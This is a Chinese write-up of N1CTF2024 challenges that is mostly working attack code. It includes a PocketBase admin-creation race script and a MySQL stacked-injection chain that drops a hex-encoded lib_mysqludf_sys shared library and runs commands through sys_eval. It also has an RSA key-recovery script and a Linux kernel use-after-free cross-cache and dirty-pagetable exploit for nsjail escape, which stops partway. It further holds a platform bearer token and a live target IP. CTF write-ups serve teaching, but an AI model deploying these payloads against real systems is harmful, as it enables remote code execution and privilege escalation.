N1CTF2024

Thu Nov 14 2024

目录

• Web
  • n1stagram
  • Esc Error
• Crypto
  • N0TR5A
• PWN
  • heap_master

Web

n1stagram

这个题主要利用 pocketbase 不会自动设置管理员账户。通过 docker-compose 文件可以发现，在 pocketbase 的 app 容器实例化后才会实例化 prepare 容器。但是 prepare 容器的 prepare.js 在启动后至少要 5 秒钟才会进行设置 admin 的操作，所以通过轮询获取比赛平台的运行容器 url 地址，然后设置 admin 账户，登录后访问 secret_posts 即可

import requests
import time

headers={
    "Authorization":"Bearer 1ac0390f2120ea8306326538d2a06ccd4943fe52"
}

while True:
    time.sleep(1)
    url="https://ctf2024.nu1l.com/User_API/Challenge/Running"
    res=requests.post(url,headers=headers)
    data=res.json()['data']
    items=data['items']
    if len(items)>1 and len(items[1]['url'])>1:
        print(items[1])
        for u in items[1]['url']:
            if "http" in u:
                url=u
        break

url1=url+"/api/admins"
email="admin@ctf.com"
password="admin12345"
data={
    "email": email,
    "password": password,
    "passwordConfirm": password,
}
res=requests.post(url=url1,json=data)
print(res.content.decode())

url1=url+"/api/admins/auth-with-password"
data={
    "identity":email,
    "Password":password
}
res=requests.post(url=url1,json=data)
print(res.json())
token=res.json()['token']
time.sleep(10)

url1=url+"/api/collections/secret_posts/records"
headers={
    "Authorization":token
}
data={
    "email":email,
    "password":password,
}
res=requests.get(url=url1,headers=headers)
print(res.content.decode())

Esc Error

这个题的考点一个是 sql 注入通过 udf 达成 RCE，一个是利用 5.00 版本的 ujson 产生的 segment fault 使程序崩溃重启，使得建立的目录可以保留。

主要思路：首先要制造 segment fault 很简单，只需让 username 是一个 unicode 编码即可。所以第一步是通过/update 路由插入一个新用户，用户名是\udf13，email 是 a。然后通过通过/dump 路由产生错误，这里的 path 可以通过采用 window path 的方式绕过，类似这样D:/\\\\\ee/../../../../../home/ctf/lib/。重启两次创建好 plugins 目录后，就可以通过/update 路由第一处 sql 语句进行注入，这里会在单引号前加上反斜杠，这里可以直接传入’，通过替换会变成\‘，这样查询的 username 就会变成\。后面就是正常的 sql 堆叠注入了。

import requests
import string
import itertools
import hashlib
import re
import time

payload1="a\\' ; SELECT 0x7f454c4602010100000000000000000003003e0001000000d00c0000000000004000000000000000e8180000000000000000000040003800050040001a00190001000000050000000000000000000000000000000000000000000000000000001415000000000000141500000000000000002000000000000100000006000000181500000000000018152000000000001815200000000000700200000000000080020000000000000000200000000000020000000600000040150000000000004015200000000000401520000000000090010000000000009001000000000000080000000000000050e57464040000006412000000000000641200000000000064120000000000009c000000000000009c00000000000000040000000000000051e5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000250000002b0000001500000005000000280000001e000000000000000000000006000000000000000c00000000000000070000002a00000009000000210000000000000000000000270000000b0000002200000018000000240000000e00000000000000040000001d0000001600000000000000130000000000000000000000120000002300000010000000250000001a0000000f000000000000000000000000000000000000001b00000000000000030000000000000000000000000000000000000000000000000000002900000014000000000000001900000020000000000000000a00000011000000000000000000000000000000000000000d0000002600000017000000000000000800000000000000000000000000000000000000000000001f0000001c0000000000000000000000000000000000000000000000020000000000000011000000140000000200000007000000800803499119c4c93da4400398046883140000001600000017000000190000001b0000001d0000002000000022000000000000002300000000000000240000002500000027000000290000002a00000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed871581cc1e2f7dea868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff36ac68ae3b9fd4a0ac73d1c525681b320b5911feab5fbe120000000000000000000000000000000000000000000000000000000003000900a00b0000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000e0000000120000000000000000000000de01000000000000790100001200000000000000000000007700000000000000ba0000001200000000000000000000003504000000000000f5000000120000000000000000000000c2010000000000009e010000120000000000000000000000d900000000000000fb000000120000000000000000000000050000000000000016000000220000000000000000000000fe00000000000000cf000000120000000000000000000000ad00000000000000880100001200000000000000000000008000000000000000ab010000120000000000000000000000250100000000000010010000120000000000000000000000dc00000000000000c7000000120000000000000000000000c200000000000000b5000000120000000000000000000000cc02000000000000ed000000120000000000000000000000e802000000000000e70000001200000000000000000000009b00000000000000c200000012000000000000000000000028000000000000008001000012000b007a100000000000006e000000000000007500000012000b00a70d00000000000001000000000000001000000012000c00781100000000000000000000000000003f01000012000b001a100000000000002d000000000000001f01000012000900a00b0000000000000000000000000000c30100001000f1ff881720000000000000000000000000009600000012000b00ab0d00000000000001000000000000007001000012000b0066100000000000001400000000000000cf0100001000f1ff981720000000000000000000000000005600000012000b00a50d00000000000001000000000000000201000012000b002e0f0000000000002900000000000000a301000012000b00f71000000000000041000000000000003900000012000b00a40d00000000000001000000000000003201000012000b00ea0f0000000000003000000000000000bc0100001000f1ff881720000000000000000000000000006500000012000b00a60d00000000000001000000000000002501000012000b00800f0000000000006a000000000000008500000012000b00a80d00000000000003000000000000001701000012000b00570f00000000000029000000000000005501000012000b0047100000000000001f00000000000000a900000012000b00ac0d0000000000009a000000000000008f01000012000b00e8100000000000000f00000000000000d700000012000b00460e000000000000e800000000000000005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e6974007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c00666f726b00737973636f6e66006d6d6170007374726e6370790077616974706964007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f630066676574730070636c6f7365007379735f6576616c5f696e697400737472637079007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f657865630073797374656d007379735f73657400736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e322e35000000000000000000020002000200020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100000001000100b20100001000000000000000751a690900000200d401000000000000801720000000000008000000000000008017200000000000d01620000000000006000000020000000000000000000000d81620000000000006000000030000000000000000000000e016200000000000060000000a00000000000000000000000017200000000000070000000400000000000000000000000817200000000000070000000500000000000000000000001017200000000000070000000600000000000000000000001817200000000000070000000700000000000000000000002017200000000000070000000800000000000000000000002817200000000000070000000900000000000000000000003017200000000000070000000a00000000000000000000003817200000000000070000000b00000000000000000000004017200000000000070000000c00000000000000000000004817200000000000070000000d00000000000000000000005017200000000000070000000e00000000000000000000005817200000000000070000000f00000000000000000000006017200000000000070000001000000000000000000000006817200000000000070000001100000000000000000000007017200000000000070000001200000000000000000000007817200000000000070000001300000000000000000000004883ec08e827010000e8c2010000e88d0500004883c408c3ff35320b2000ff25340b20000f1f4000ff25320b20006800000000e9e0ffffffff252a0b20006801000000e9d0ffffffff25220b20006802000000e9c0ffffffff251a0b20006803000000e9b0ffffffff25120b20006804000000e9a0ffffffff250a0b20006805000000e990ffffffff25020b20006806000000e980ffffffff25fa0a20006807000000e970ffffffff25f20a20006808000000e960ffffffff25ea0a20006809000000e950ffffffff25e20a2000680a000000e940ffffffff25da0a2000680b000000e930ffffffff25d20a2000680c000000e920ffffffff25ca0a2000680d000000e910ffffffff25c20a2000680e000000e900ffffffff25ba0a2000680f000000e9f0feffff00000000000000004883ec08488b05f50920004885c07402ffd04883c408c390909090909090909055803d900a2000004889e5415453756248833dd809200000740c488b3d6f0a2000e812ffffff488d05130820004c8d2504082000488b15650a20004c29e048c1f803488d58ff4839da73200f1f440000488d4201488905450a200041ff14c4488b153a0a20004839da72e5c605260a2000015b415cc9c3660f1f8400000000005548833dbf072000004889e57422488b05530920004885c07416488d3da70720004989c3c941ffe30f1f840000000000c9c39090c3c3c3c331c0c3c341544883c9ff4989f455534883ec10488b4610488b3831c0f2ae48f7d1488d69ffe8b6feffff83f80089c77c61754fbf1e000000e803feffff488d70ff4531c94531c031ffb921000000ba07000000488d042e48f7d64821c6e8aefeffff4883f8ff4889c37427498b4424104889ea4889df488b30e852feffffffd3eb0cba0100000031f6e802feffff31c0eb05b8010000005a595b5d415cc34157bf00040000415641554531ed415455534889f34883ec1848894c24104c89442408e85afdffffbf010000004989c6e84dfdffffc600004889c5488b4310488d356a030000488b38e814feffff4989c7eb374c89f731c04883c9fff2ae4889ef48f7d1488d59ff4d8d641d004c89e6e8ddfdffff4a8d3c284889da4c89f64d89e54889c5e8a8fdffff4c89fabe080000004c89f7e818fdffff4885c075b44c89ffe82bfdffff807d0000750a488b442408c60001eb1f42c6442dff0031c04883c9ff4889eff2ae488b44241048f7d148ffc94889084883c4184889e85b5d415c415d415e415fc34883ec08833e014889d7750b488b460831d2833800740e488d353a020000e817fdffffb20188d05ec34883ec08833e014889d7750b488b460831d2833800740e488d3511020000e8eefcffffb20188d05fc3554889fd534889d34883ec08833e027409488d3519020000eb3f488b46088338007409488d3526020000eb2dc7400400000000488b4618488b384883c70248037808e801fcffff31d24885c0488945107511488d351f0200004889dfe887fcffffb20141585b88d05dc34883ec08833e014889f94889d77510488b46088338007507c6010131c0eb0e488d3576010000e853fcffffb0014159c34154488d35ef0100004989cc4889d7534889d34883ec08e832fcffff49c704241e0000004889d8415a5b415cc34883ec0831c0833e004889d7740e488d35d5010000e807fcffffb001415bc34883ec08488b4610488b38e862fbffff5a4898c34883ec28488b46184c8b4f104989f2488b08488b46104c89cf488b004d8d4409014889c6f3a44c89c7498b4218488b0041c6040100498b4210498b5218488b4008488b4a08ba010000004889c6f3a44c89c64c89cf498b4218488b400841c6040000e867fbffff4883c4284898c3488b7f104885ff7405e912fbffffc3554889cd534c89c34883ec08488b4610488b38e849fbffff4885c04889c27505c60301eb1531c04883c9ff4889d7f2ae48f7d148ffc948894d00595b4889d05dc39090909090909090554889e5534883ec08488b05c80320004883f8ff7419488d1dbb0320000f1f004883eb08ffd0488b034883f8ff75f14883c4085bc9c390904883ec08e86ffbffff4883c408c345787065637465642065786163746c79206f6e6520737472696e67207479706520706172616d657465720045787065637465642065786163746c792074776f20617267756d656e747300457870656374656420737472696e67207479706520666f72206e616d6520706172616d6574657200436f756c64206e6f7420616c6c6f63617465206d656d6f7279006c69625f6d7973716c7564665f7379732076657273696f6e20302e302e34004e6f20617267756d656e747320616c6c6f77656420287564663a206c69625f6d7973716c7564665f7379735f696e666f290000011b033b980000001200000040fbffffb400000041fbffffcc00000042fbffffe400000043fbfffffc00000044fbffff1401000047fbffff2c01000048fbffff44010000e2fbffff6c010000cafcffffa4010000f3fcffffbc0100001cfdffffd401000086fdfffff4010000b6fdffff0c020000e3fdffff2c02000002feffff4402000016feffff5c02000084feffff7402000093feffff8c0200001400000000000000017a5200017810011b0c070890010000140000001c00000084faffff01000000000000000000000014000000340000006dfaffff010000000000000000000000140000004c00000056faffff01000000000000000000000014000000640000003ffaffff010000000000000000000000140000007c00000028faffff030000000000000000000000140000009400000013faffff01000000000000000000000024000000ac000000fcf9ffff9a00000000420e108c02480e18410e20440e3083048603000000000034000000d40000006efaffffe800000000420e10470e18420e208d048e038f02450e28410e30410e38830786068c05470e50000000000000140000000c0100001efbffff2900000000440e100000000014000000240100002ffbffff2900000000440e10000000001c0000003c01000040fbffff6a00000000410e108602440e188303470e200000140000005c0100008afbffff3000000000440e10000000001c00000074010000a2fbffff2d00000000420e108c024e0e188303470e2000001400000094010000affbffff1f00000000440e100000000014000000ac010000b6fbffff1400000000440e100000000014000000c4010000b2fbffff6e00000000440e300000000014000000dc01000008fcffff0f00000000000000000000001c000000f4010000fffbffff4100000000410e108602440e188303470e2000000000000000000000ffffffffffffffff0000000000000000ffffffffffffffff000000000000000000000000000000000100000000000000b2010000000000000c00000000000000a00b0000000000000d00000000000000781100000000000004000000000000005801000000000000f5feff6f00000000a00200000000000005000000000000006807000000000000060000000000000060030000000000000a00000000000000e0010000000000000b0000000000000018000000000000000300000000000000e81620000000000002000000000000008001000000000000140000000000000007000000000000001700000000000000200a0000000000000700000000000000c0090000000000000800000000000000600000000000000009000000000000001800000000000000feffff6f00000000a009000000000000ffffff6f000000000100000000000000f0ffff6f000000004809000000000000f9ffff6f0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000401520000000000000000000000000000000000000000000ce0b000000000000de0b000000000000ee0b000000000000fe0b0000000000000e0c0000000000001e0c0000000000002e0c0000000000003e0c0000000000004e0c0000000000005e0c0000000000006e0c0000000000007e0c0000000000008e0c0000000000009e0c000000000000ae0c000000000000be0c0000000000008017200000000000004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200002e7368737472746162002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0000000500000002000000000000005801000000000000580100000000000048010000000000000300000000000000080000000000000004000000000000000b000000f6ffff6f0200000000000000a002000000000000a002000000000000c000000000000000030000000000000008000000000000000000000000000000150000000b00000002000000000000006003000000000000600300000000000008040000000000000400000002000000080000000000000018000000000000001d00000003000000020000000000000068070000000000006807000000000000e00100000000000000000000000000000100000000000000000000000000000025000000ffffff6f020000000000000048090000000000004809000000000000560000000000000003000000000000000200000000000000020000000000000032000000feffff6f0200000000000000a009000000000000a009000000000000200000000000000004000000010000000800000000000000000000000000000041000000040000000200000000000000c009000000000000c00900000000000060000000000000000300000000000000080000000000000018000000000000004b000000040000000200000000000000200a000000000000200a0000000000008001000000000000030000000a0000000800000000000000180000000000000055000000010000000600000000000000a00b000000000000a00b000000000000180000000000000000000000000000000400000000000000000000000000000050000000010000000600000000000000b80b000000000000b80b00000000000010010000000000000000000000000000040000000000000010000000000000005b000000010000000600000000000000d00c000000000000d00c000000000000a80400000000000000000000000000001000000000000000000000000000000061000000010000000600000000000000781100000000000078110000000000000e000000000000000000000000000000040000000000000000000000000000006700000001000000320000000000000086110000000000008611000000000000dd000000000000000000000000000000010000000000000001000000000000006f000000010000000200000000000000641200000000000064120000000000009c000000000000000000000000000000040000000000000000000000000000007d000000010000000200000000000000001300000000000000130000000000001402000000000000000000000000000008000000000000000000000000000000870000000100000003000000000000001815200000000000181500000000000010000000000000000000000000000000080000000000000000000000000000008e000000010000000300000000000000281520000000000028150000000000001000000000000000000000000000000008000000000000000000000000000000950000000100000003000000000000003815200000000000381500000000000008000000000000000000000000000000080000000000000000000000000000009a000000060000000300000000000000401520000000000040150000000000009001000000000000040000000000000008000000000000001000000000000000a3000000010000000300000000000000d016200000000000d0160000000000001800000000000000000000000000000008000000000000000800000000000000a8000000010000000300000000000000e816200000000000e8160000000000009800000000000000000000000000000008000000000000000800000000000000b1000000010000000300000000000000801720000000000080170000000000000800000000000000000000000000000008000000000000000000000000000000b7000000080000000300000000000000881720000000000088170000000000001000000000000000000000000000000008000000000000000000000000000000bc000000010000000000000000000000000000000000000088170000000000009b000000000000000000000000000000010000000000000000000000000000000100000003000000000000000000000000000000000000002318000000000000c500000000000000000000000000000001000000000000000000000000000000 INTO DUMPFILE \"/home/ctf/lib/plugins/udf.so\";#"

payload2="a\\' ;CREATE FUNCTION sys_eval RETURNS STRING SONAME \"udf.so\";#"
payload3="a\\' ;INSERT INTO user (username, email) VALUES (\"rce\",(select sys_eval(\"/readflag\")));commit;#"

# domain="http://192.168.10.18:30000"
domain="http://120.26.69.200:50353"

debug=False

def calc_code(suffer,hash_value):
    characters = string.ascii_letters + string.digits
    all_dict=itertools.product(characters,repeat=4)
    for item in all_dict:
        code="".join(list(item))
        if hashlib.sha256((suffer+code).encode()).hexdigest()==hash_value:
            print(code)
            return code

def get_hash():
    if debug:
        return
    url=f"{domain}"
    res=requests.get(url).content.decode()
    hash_value=re.findall(r'hash:\"(.*?)\"\<',res)[0]
    suffer=re.findall(r'suffer:\"(.*?)\"\<',res)[0]
    return calc_code(suffer=suffer,hash_value=hash_value)

def insert_unicode():
    url=f"{domain}/update"
    data={
        "username":"\\udf13",
        "email":"a",
        "code":get_hash()
    }
    res=requests.post(url=url,data=data)
    print(res.content.decode())

def sql_inject(payload):
    url=f"{domain}/update"
    data={
        "username":payload,
        "email":"a",
        "code":get_hash()
    }
    res=requests.post(url=url,data=data)
    print(res.content.decode())

def makeError(dir_path):
    url=f"{domain}/dump"
    data={
        "username":"\\udf13",
        "path":f"D:/\\\\\\\\\\ee/../../../../..{dir_path}",
        "code":get_hash()
    }
    try:
        res=requests.post(url=url,data=data)
        print(res.content.decode())
    except:
        print("make error success")

def get_rce_result():
    url=f"{domain}/dump"
    data={
        "username":"rce",
        "path":f"D:/\\\\\\\\\\ee/../../../../../tmp/t1",
        "code":get_hash()
    }
    try:
        res=requests.post(url=url,data=data)
        print(res.content.decode())
    except:
        print("make error success")

insert_unicode()
makeError("/home/ctf/lib/")
time.sleep(5)
makeError("/home/ctf/lib/plugins")
time.sleep(5)
sql_inject(payload1)
sql_inject(payload2)
sql_inject(payload3)
get_rce_result()

Crypto

N0TR5A

关键发现，e 的高位可以这样表示，那就是关于 key 的单变量 copper

print((((kk*n+1)//dd) >> 562) << 562 == (ee >> 562) << 562)

grobner 基打一下

from Crypto.Util.number import *
import random
import gmpy2

def divide_pq(e, d, n):
    k = e*d - 1
    while True:
        g = random.randint(2, n-1)
        t = k
        while True:
            if t % 2 != 0:
                break
            t //= 2
            x = pow(g, t, n)
            if x > 1 and gmpy2.gcd(x-1, n) > 1:
                p = gmpy2.gcd(x-1, n)
                return (p, n//p)

n = 82699881935193109791472212259236125591789180928354081401868164018417228277481034922264132029171387301840769422435233519725339633533151517379984801310897094212731380971539763520078187279519479595450340858225632773423726273875857681742976022998251134553236897670416440247498103588885527592983304472279634643957
enc = 36794479248642872612364238056628323098776595394584051168003253681308381469543148020365981382945118247106425767548419728448043683874348775891060829403456974633618540620271474325940287199561651410530249693150249056719801828452373946254944967790634308791835260415588851915975925342336816758487259438650490430459
e = [8888429835496095643535631191491505388277997809079089914782728064936463291203724475916011147975968533541243766266627762336328575049254500085648004975612619037464278832991, 10520875896679093312405671804517920324087646023792222747154447628464758710245963882871820387158134686949159913616463457692301596583039366392879522319633770989600617793993, 10601203527211713579180750988795815135916059018550710650265113080975290409723984434909955571406050178911560767494058644740527759576770265488136304573804742084915697171019, 14622236712746402638071905642098139610445903171562565245220543995502178907758821801160631615531163735803555926497329822620058537286662778517871290983128596096302228266209, 13754445300340270191221556210805776985685382903218031894668871565239317628261744219992643635369635181508144912605084390638097003753479943161757716583483371428111258641999, 12460010632813615553769774340135585477760327095310449594534663078794374775415503111884611193451554799744919010772785354797945533347796386998533715641130155450020923742093, 13453716597070478297648899092689370236302303280643930607214496697603184305419894290940911668951264509281914356651376372996746606791176528956862446530034762390956440975743, 9094611196190891372488960864378207737592838879869747718773801183985658899847575852673983345117604950170885723017205969782710348697632364573814601979741607809886580452089, 6208536025163051261514520489326917558898635960331271412905419257732637120279699170648486672913828237574848376496958272367037120192950777084064981617441543021966571267615, 12222783896133215551045666761401890068457062194802465729916062142356007806837055121210344156062210736292529151537109874603945090163748106129066462428445187619153477674477, 12614188721315363674299785508736495244859114088280924894674179341352352570584522323159835229814636248801721832488735354744616443270824945572498647598651837749451947061719, 1152998684313785798360794952776294245536465631931933802028441841686020994002404128005468864877622660410537371162754781745360983347732927142593427077571775783417497297097]
k = [1420437810145904840211095643676412643944076218177458138046274525430773202929328250820697290122977318065170030510975153884301846687954934017, 3940861961324077864997765290105972644424759701256821322813075596188909751606433001282290039081974406373664979502491212469917425748074824949, 9413004926123376989637174399517514326721338378609741980303584526041973145706068370477394363722601798762946415087687748257511626645382494821, 7428184730507734867291435325705251542125906508735340171046981085055137680467341685699246562820294813340827360115146667698628846494205603434, 5807754291508765665701362465833864063188458758878871682965086597196662689504909848658274758620320439529911831751168255058459646445501084679, 4757450447044159731910445277826227301213629775871240625040932054281107227037248484860063739616068171487636025286033326826668030840136004650, 5996697334509086666652114545471399499880715834871318018958944856630439665570432872031097645146070471243016581178433327374429447296670643144, 34948977643936917247938455046939890895031986466384330025838204273490152867215005144463212975331851051065343323158463423475270019458998722, 2108517589993394132588916598627794212409854321151001283809351367884838987309441276260578523735992656738890197115589763805165681991611220869, 7529989400759036686155222444072464272422956186987614547747593414852898515920566835606491795646900457120392171067632339816915038614860409008, 5919516150531691402185931957988063032510639008912552676259537229103356758278878266990953285696298526725065525943655778090084815308411600528, 6143553530848821997030657441615076975797083210691917101599644261591827822351051233391184584862183963084085114519636359680935327311007033284]

nbit=1024
print(n.bit_length())
kbit = int(nbit * 0.4512)
print(kbit)

P.<x,key> = PolynomialRing(ZZ)

G = []
for i in range(12):
    f = ((((k[i] * n + 1) // (key + 2*i+2)) // 2 ^ 562) * 2 ^ 562 * (key + 2*i+2) + e[i] * (key + 2*i+2) - 1)+k[i]*(x)
    G.append(f)



B = Ideal(G).groebner_basis()


for i in B:
    print(i)
print(15095849699286165408966218323953075563667684881665761713504825200982496649568595408344506900710635070165873500123055379599082338519699170530245737005730784174597581307904-15095849699286165408966218323943643546943004447925908108564635585123957492580305600067615457218592381711386453045325474579587501532050946322430153508320619742043108765423)
key=9432016724680433739853604940189615858539156988289808276891443492042688454487047077729905019494836987648224207815583497410164432554472542481
dd0=key+2
e0=((((k[0]*n+1)//dd0)>>562)<<562)+e[0]
print(e0)

print(divide_pq(e0,dd0,n))
p=11160953866564014386357917233545443013430234815113774191650834146184099650834219653867538766153758823696620202174996129263668574623055473558059777024396819
q=7409750360401131684857482405083078655163098512959502073118688949451629255099573556672463143175919957772438004374591517133143009713373629434280555139276503
phi=(p-1)*(q-1)
d=inverse_mod(65537,phi)

print(long_to_bytes(pow(enc,d,n)))

PWN

heap_master

dirty_pagetable+nsjail 逃逸

// test for cross cache attack

#define _GNU_SOURCE
#include <stdlib.h>
#include <stdint.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sched.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/resource.h>
#include <stdio.h>
#include <err.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <linux/kcmp.h>
#include <sys/msg.h>
#include <sys/ipc.h>

#define DMA_HEAP_IOCTL_ALLOC 0xc0184800
typedef unsigned long long u64;
typedef unsigned int u32;
struct dma_heap_allocation_data {
  u64 len;
  u32 fd;
  u32 fd_flags;
  u64 heap_flags;
};

void hexx(char *msg, size_t value){
    printf("\033[32m\033[1m[+] %s: %#lx\n\033[0m", msg, value);
}

void errExit(char * msg)
{
    printf("[x] Error at: %s\n", msg);
    exit(EXIT_FAILURE);
}

void p(){
    puts("111");
    getchar();
    puts("222");
}
// setup process memory
static void adjust_rlimit() {
  struct rlimit rlim;
  rlim.rlim_cur = rlim.rlim_max = (200 << 20);
  setrlimit(RLIMIT_AS, &rlim);
  rlim.rlim_cur = rlim.rlim_max = 32 << 20;
  setrlimit(RLIMIT_MEMLOCK, &rlim);
  rlim.rlim_cur = rlim.rlim_max = 136 << 20;
  // setrlimit(RLIMIT_FSIZE, &rlim);
  rlim.rlim_cur = rlim.rlim_max = 1 << 20;
  setrlimit(RLIMIT_STACK, &rlim);
  rlim.rlim_cur = rlim.rlim_max = 0;
  setrlimit(RLIMIT_CORE, &rlim);
  // RLIMIT_FILE
  rlim.rlim_cur = rlim.rlim_max = 0x6000;
  if (setrlimit(RLIMIT_NOFILE, &rlim) < 0) {  // RLIMIT_NOFILE 最大打开文件描述符限制，默认为 1024, 需设置为 14096, 便于喷射 `file` 结构
    rlim.rlim_cur = rlim.rlim_max = 4096;
    if (setrlimit(RLIMIT_NOFILE, &rlim) < 0) {
      perror("[-] setrlimit");
      err(1, "[-] setrlimit");
    }
  }
}

void pin_on_cpu(int cpu) {
  cpu_set_t cpu_set;
  CPU_ZERO(&cpu_set);
  CPU_SET(cpu, &cpu_set);
  if (sched_setaffinity(0, sizeof(cpu_set), &cpu_set) != 0) {
    perror("sched_setaffinity()");
    exit(EXIT_FAILURE);
  }
}

uint64_t buf,buf2;
uint64_t offset=0;
int file_fd[0x1000];
int size=0xc0;  //sudo cat /sys/kernel/slab/filp/object_size
int num=0x100;   //sudo cat /sys/kernel/slab/filp/objs_per_slab
int victim_id,victim_id2;
int victim_fd;
char mm[0x1000]={0};
int fd;
uint64_t* spray_page[0x1000]={0};
int pagenum=0x200;
int dmafd;

void create(int fd,uint32_t idx){
    if(ioctl(fd,0x1337,&idx)!=0){
        errExit("create uaf");
    }
}

void free1(int fd,uint32_t idx){
    if(ioctl(fd,0x1338,&idx)!=0){
        errExit("create uaf");
    }
}

void freebk(int fd,uint32_t idx){
    if(ioctl(fd,0x1339,&idx)!=0){
        errExit("create uaf");
    }
}

void cross_cache_attack2(){

    int ret=0;
    int i=victim_id;
    char mm[0x1000]={0};

    for(i=0;i<num;i++){
        create(fd,i);
    }

    victim_fd=num/2;
    hexx("victim_fd",victim_fd);

    puts("release all");
    for(i=0;i<num/2;i++){
        free1(fd,i);
    }

    freebk(fd,num/2);

    for(i=num/2+1;i<num;i++){
        free1(fd,i);
    }

}

void cross_cache_attack(){
      int num=0x100;

      system("touch a");
      system("chmod 777 a");
      system("touch b");
      system("chmod 777 b");
      for(int i=0;i<num;i++){
        if( (file_fd[i]=open("./a",O_RDWR)) <0){
            hexx("i",i);
            errExit("open low_file");
            }
      }

// p();
    free1(fd,0x80);
    // p();
    for(int i=0;i<num;i++)
    if( (file_fd[num+i]=open("./b",O_RDWR)) <0){
        errExit("open low_file");
    }

    puts("search the same fd");
    for(int i=0;i<num;i++)
      for (int j = 0; j < num; j++) {

        if (syscall(__NR_kcmp, getpid(), getpid(), KCMP_FILE, file_fd[num+i], file_fd[j]) == 0)
        {
          printf("[10-1] found overlapped file, id : %d, %d\n",j,num+i);
          victim_id=j;
          victim_id2=num+i;
          goto aaa;
      }
      }
      aaa:
      hexx("victim_id",victim_id);
      hexx("victim_id2",victim_id2);
      victim_fd=file_fd[victim_id];

      for(int i=0;i<num;i++){
        if(i==victim_id){
            if( close(file_fd[victim_id2]) <0){
            hexx("file_fd[victim_id2]",file_fd[victim_id2]);
            errExit("close low_file");
        }
        continue;
        }
        if( close(file_fd[i]) <0){
            hexx("file_fd[i]",file_fd[i]);
            errExit("close low_file");
        }
      }

}

static void win() {
  char buf[0x100];
  int fd = open("/dev/sda", O_RDONLY);
  if (fd < 0) {
    puts("[-] Lose...");
  } else {
    puts("[+] Win!");
    read(fd, buf, 0x100);
    write(1, buf, 0x100);
    puts("[+] Done");
    pause();
  }
  exit(0);
}

size_t user_cs,user_ss,user_sp,user_rflags;
void save_status()
{
    __asm__(
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
    );
    puts("\033[32m\033[1m[+] status has been saved!\033[0m");
}

int main(){

    int cpu_cores = 0;
    cpu_cores = sysconf(_SC_NPROCESSORS_ONLN);
    hexx("cores",cpu_cores);
    pin_on_cpu(0);
    save_status();
    adjust_rlimit();

    if((fd=open("/dev/safenote",O_RDONLY))<0){
        errExit("epen dev");
    }

    for (int i = 0; i < pagenum; i++){
        // hexx("i",i);
        spray_page[i] = mmap((void *)(0xdead0000UL + i*(0x10000UL)),
                            0x8000, PROT_READ | PROT_WRITE,
                            MAP_ANONYMOUS | MAP_SHARED, -1, 0);
        // hexx("spray_page[i]",spray_page[i]);
        if (spray_page[i] == MAP_FAILED)
            errExit("fail to mmap space");
    }

    cross_cache_attack2();
    cross_cache_attack();
    // p();

    puts("heap spray the target struct");
    for (int i = 0; i < pagenum/2; i++){
        for (int j = 0; j < 8; j++){
            uint64_t addr=(char*)spray_page[i] + j*0x1000;
            *(char*)addr = 'A' + j;
            // p();
        }
    }

    dmafd = open("/dev/dma_heap/system", O_RDONLY);
    if (dmafd < 0) errExit("Fail open dma_heap");

    // alloc dma-buf heap which is same as the order of pages of a page table
    struct dma_heap_allocation_data data;
    data.len = 0x1000;
    data.fd_flags = O_RDWR;
    data.heap_flags = 0;
    data.fd = 0;

    if (ioctl(dmafd, DMA_HEAP_IOCTL_ALLOC, &data) < 0) {
        errExit("DMA_HEAP_IOCTL_ALLOC");
        return -1;
    }
    int dma_buf_fd = data.fd;
    hexx("dma_buf_fd",dma_buf_fd);

    for (int i = pagenum/2; i < pagenum; i++){
        for (int j = 0; j < 8; j++){
            uint64_t addr=(char*)spray_page[i] + j*0x1000;
            *(char*)addr = 'A' + j;
            // p();
        }
    }

// p();

// file uaf

    puts("start dup");
    //search victim pagetable
    for (int i = 0; i < 0x1000; i++){
        // hexx("i",i);
        if(dup(victim_fd)<0){ //增加引用次数，增量原语
            hexx("i",i);
            errExit("dup victim");
        }
    }
// p();
    puts("search the victim page_table");
    int idx=0;
    for(int i=0;i<pagenum;i++){
        // hexx("i",i);
        if(*((char*)spray_page[i] + 7*0x1000)!=('A'+7)){
            puts("found!");
            idx=i;
            hexx("idx",idx);
            break;
        }
    }

    puts("overwrite dma_buf");
    munmap((char*)spray_page[idx] + 7*0x1000, 0x1000);
